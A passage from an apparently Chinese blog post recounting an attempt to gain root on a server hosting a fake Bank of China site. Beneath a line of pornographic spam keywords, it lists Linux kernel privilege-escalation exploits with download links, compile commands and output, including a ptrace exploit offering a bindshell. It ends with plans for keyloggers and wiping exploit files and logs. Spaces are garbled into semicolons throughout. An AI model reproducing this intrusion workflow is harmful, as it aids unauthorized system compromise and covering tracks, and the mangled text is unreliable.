日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

www.banochi.net 虛假中國銀行入侵嘗試實錄( 二 )


http://isec.pl/vulnerabilities/isec-0021-uselib.txt
文件:
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
測試:
gcc;-O2;-fomit-frame-pointer;elflbl_v108.c;-o;elflbl_v108;
elflbl_v108.c:;In;function;`check_vma_flags’:;
elflbl_v108.c:545:;warning:;deprecated;use;of;label;at;end;of;compound;statement;
./elflbl_v108;
child;1;VMAs;0;
[ ];moved;stack;bff73000,;task_size=0xc0000000,;map_base=0xbf800000;
[ ];vmalloc;area;0xc7c00000;-;0xcf707000;
Wait...;-Segmentation;fault;
gcc;-O2;-fomit-frame-pointer;elflbl_v109.c;-o;elflbl_v109;
./elflbl_v109;
[ ];SLAB;cleanup;
[-];FAILED:;get_slab_objs:;/proc/slabinfo;not;readable?;(No;such;file;or;directory);
sh:;line;9:;24080;Killed;;;;;./elflbl_v109;
(3)Linux內(nèi)核本地整數(shù)溢出和內(nèi)存泄露漏洞
fun;with;linux;kernel
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269&keyword=
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
測試:
gcc;-o;vc;vc_resize.c;
./vc_resize;
open:;No;such;device;or;address;
gcc;memory_leak.c;-o;memory_leak;
memory_leak.c:80:2:;warning:;no;newline;at;end;of;file;
(4)Linux;Kernel;do_mremap;VMA本地權(quán)限提升漏洞
Linux;kernel;do_mremap;VMA;limit;local;privilege;escalation
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=提升
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文件:
http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
測試:
gcc;-O3;-static;-fomit-frame-pointer;mremap_pte.c;-o;mremap_pte;
./mremap_pte;
[ ];kernel;2.4.20-021stab022.11.777-enterprise;vulnerable:;YES;exploitable;YES;
MMAP;#65530;0x50bfa000;-;0x50bfb000;
[-];Failed;
(5)Linux;Kernel;kmod/ptrace競爭條件權(quán)限提升漏洞
linux;kmod/ptrace;bug;-;details
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=提升
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文件:
http://august.v-lo.krakow.pl/~anszom/km3.c
測試:
gcc;-o;km3;km3.c;
./km3;?;
Usage:;./km3;[-d];[-b];[-r];[-s];[-c;executable];
-d;;;;;--;use;double-ptrace;method;(to;run;interactive;programs);
-b;;;;;--;start;bindshell;on;port;4112;
-r;;;;;--;support;randomized;pids;
-c;;;;;--;choose;executable;to;start;
-s;;;;;--;single-shot;mode;-;abort;if;unsuccessful;at;the;first;try;
./km3;-s;
Linux;kmod; ;ptrace;local;root;exploit;by;
=〉;Simple;mode,;executing;/usr/bin/id;〉;/dev/tty;
sizeof(shellcode)=95;
=〉;Child;process;started..........;
Failed;
(6)Linux;Kernel;i386;SMP頁錯誤處理器特權(quán)提升漏洞
Linux;kernel;i386;SMP;page;fault;handler;privilege;escalation
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
測試:
gcc;-o;smp;smp.c;
./smp;
[ ];in;thread;1;(pid;=;5400);
[ ];in;thread;2;(pid;=;5401);
[ ];rdtsc;calibration:;53428;
[ ];exploiting;race,;wait...;
[-];unable;to;exploit;race;in;30s,;
kernel;patched;or;load;too;high.;
嘗試多個本地提權(quán)均未能成功!很郁悶!而在測試過程的時候,虛假網(wǎng)站已經(jīng)被關(guān)閉了,雖然文件還在,但是很明顯官方已經(jīng)作了努力,并得到了不錯的結(jié)果 。
6、其他
找了幾個linux的鍵盤記錄,都要root權(quán)限 。而服務(wù)器遠(yuǎn)程連接使用的ssh的,使用sniffer也估計沒戲,所以暫時也沒什么思路,清理exp、日志文件 。
以上是我的一些測試的結(jié)果,結(jié)果也沒有拿到root,不過我整理了一下相關(guān)的漏洞,希望對大家以后有些幫助 。在站長群里發(fā)布了相關(guān)的結(jié)果,也沒有人回話,不知道大家是太忙 。。。

推薦閱讀